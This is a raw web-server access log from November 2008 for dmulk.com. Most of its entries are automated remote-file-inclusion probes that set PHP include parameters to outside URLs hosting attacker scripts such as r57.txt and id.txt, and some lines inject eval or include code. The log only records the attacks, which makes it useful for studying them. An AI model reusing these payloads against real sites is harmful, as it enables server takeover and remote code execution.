64.135.71.20 - - [29/Nov/2008:08:56:01 -0800] "GET /logs/access_080722.log//signup//announcements.php?phpraid_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:56:04 -0800] "GET /logs/access_080722.log//signup//announcements.php?phpraid_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:56:07 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:08:56:10 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:08:56:10 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:08:56:10 -0800] "GET /logs/access_081010.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:56:22 -0800] "GET /logs/access_080223.log/?sourcedir=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:56:24 -0800] "GET /?sourcedir=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 200 94620 "-" "libwww-perl/5.810" "www.dmulk.com"
88.151.32.254 - - [29/Nov/2008:08:56:27 -0800] "GET /playing.php/common/db.php?commonpath=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:56:28 -0800] "GET /logs/?sourcedir=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 200 75738 "-" "libwww-perl/5.810" "www.dmulk.com"
88.151.32.254 - - [29/Nov/2008:08:56:28 -0800] "GET /playing.php/common/db.php?commonpath=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:08:56:30 -0800] "GET /include/lib.inc.php?site_path=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:56:34 -0800] "GET /logs/access_080831.log/?sourcedir=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:56:35 -0800] "GET /logs/access_081007.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:56:35 -0800] "GET /logs/access_081010.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:56:36 -0800] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:56:36 -0800] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:48 -0800] "GET /logs//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:48 -0800] "GET /logs/access_080912.log//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:48 -0800] "GET /logs//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:48 -0800] "GET /logs/access_080912.log%20%20//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:48 -0800] "GET /index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 200 94855 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:49 -0800] "GET /index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 200 94855 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:52 -0800] "GET /logs/access_080714.log//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:52 -0800] "GET /logs//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:53 -0800] "GET /index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 200 94871 "-" "Mozilla/5.0" "www.dmulk.com"
216.144.193.38 - - [29/Nov/2008:08:56:54 -0800] "GET /logs/access_080316.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.144.193.38 - - [29/Nov/2008:08:56:54 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.144.193.38 - - [29/Nov/2008:08:56:55 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:55 -0800] "GET /logs//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:55 -0800] "GET /logs/access_080912.log//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:55 -0800] "GET /logs/access_080303.log//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:56 -0800] "GET /index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 200 94871 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:59 -0800] "GET /logs/access_080303.log//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:59 -0800] "GET /logs/access_080714.log//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:59 -0800] "GET /logs//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:56:59 -0800] "GET /logs/access_080303.log//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:57:00 -0800] "GET /index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 200 94871 "-" "Mozilla/5.0" "www.dmulk.com"
88.151.32.254 - - [29/Nov/2008:08:57:01 -0800] "GET /signup//announcements.php?phpraid_dir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:57:01 -0800] "GET /logs/access_080303.log//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:57:02 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
83.149.99.174 - - [29/Nov/2008:08:57:08 -0800] "GET /logs/access_080303.log%20%20//index.php?config=1&base_datapath=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:08:57:14 -0800] "GET /logs/errors.php?error=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:08:57:14 -0800] "GET /errors.php?error=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:57:17 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:57:27 -0800] "GET /logs/access_080928.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:08:57:34 -0800] "GET /logs/access_081008.log/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:08:57:34 -0800] "GET /errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:08:57:35 -0800] "GET /logs/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:57:41 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:57:41 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:08:57:44 -0800] "GET /logs/access_080525.log/errors.php?error=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:08:57:44 -0800] "GET /logs/access_080507.log/errors.php?error=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:08:58:11 -0800] "GET /logs/access_080919.log//include/lib.inc.php?site_path=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:08:58:11 -0800] "GET /include/lib.inc.php?site_path=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:08:58:11 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:58:13 -0800] "GET /logs/access_080928.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:58:21 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:58:24 -0800] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:58:24 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:58:54 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:58:55 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:08:59:41 -0800] "GET /include/lib.inc.php?site_path=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:59:54 -0800] "GET /errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:00:04 -0800] "GET /logs/access_081008.log/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:00:05 -0800] "GET /errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:00:05 -0800] "GET /logs/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:00:10 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:00:29 -0800] "GET /logs/access_081017.log//include/lib.inc.php?site_path=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:00:30 -0800] "GET /errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:00:30 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:00:33 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:00:35 -0800] "GET /logs/access_080525.log/errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:00:36 -0800] "GET /errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:00:36 -0800] "GET /logs/errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:00:47 -0800] "GET /logs/access_080703.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:00:47 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:00:47 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:00:55 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:00:55 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.203.18.68 - - [29/Nov/2008:09:01:00 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.203.18.68 - - [29/Nov/2008:09:01:00 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:09:01:01 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://189.19.199.119/bit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:01:15 -0800] "GET /logs/access_080518.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:01:22 -0800] "GET /logs/access_081007.log//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:01:22 -0800] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:01:22 -0800] "GET /logs/access_081010.log//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:01:22 -0800] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.78.215 - - [29/Nov/2008:09:01:33 -0800] "GET /bikes/?N=D HTTP/1.0" 200 2853 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:01:33 -0800] "GET /logs/access_081010.log//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:01:33 -0800] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:01:33 -0800] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:01:33 -0800] "GET /logs/access_081007.log//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.53.4 - - [29/Nov/2008:09:01:34 -0800] "GET /logs/access_080626.log/index.php?url=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.236.53.4 - - [29/Nov/2008:09:01:34 -0800] "GET /logs/index.php?url=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.236.53.4 - - [29/Nov/2008:09:01:35 -0800] "GET /index.php?url=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 200 94884 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:01:36 -0800] "GET /logs/access_080804.log//pjsfiles/modify.php?installed_config_file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.236.53.4 - - [29/Nov/2008:09:01:46 -0800] "GET /logs/access_080909.log/index.php?url=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:01:46 -0800] "GET /logs/access_080919.log//include/lib.inc.php?site_path=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:01:47 -0800] "GET /include/lib.inc.php?site_path=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:01:49 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:01:59 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.30 - - [29/Nov/2008:09:02:18 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.30 - - [29/Nov/2008:09:02:20 -0800] "GET /blog/index.php/2008/08/12/westoc-2008-trip-61208-62708/?show=slide&nggpage=6 HTTP/1.1" 200 66126 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
208.80.194.46 - - [29/Nov/2008:09:02:22 -0800] "GET / HTTP/1.0" 200 94128 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 2.8; IEMB3; Windows-Media-Player/10.00.00.3990; Zango 10.0.314.0; IEMB3)" "dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:02:38 -0800] "GET /logs/access_080509.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/hidayatkhoir/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:02:39 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/hidayatkhoir/idq.txt??? HTTP/1.1" 200 95096 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:02:39 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/hidayatkhoir/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:02:44 -0800] "GET /logs/access_080226.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:02:44 -0800] "GET /components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:02:47 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:02:53 -0800] "GET /logs/access_080226.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:02:53 -0800] "GET /components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:02:54 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:02:58 -0800] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
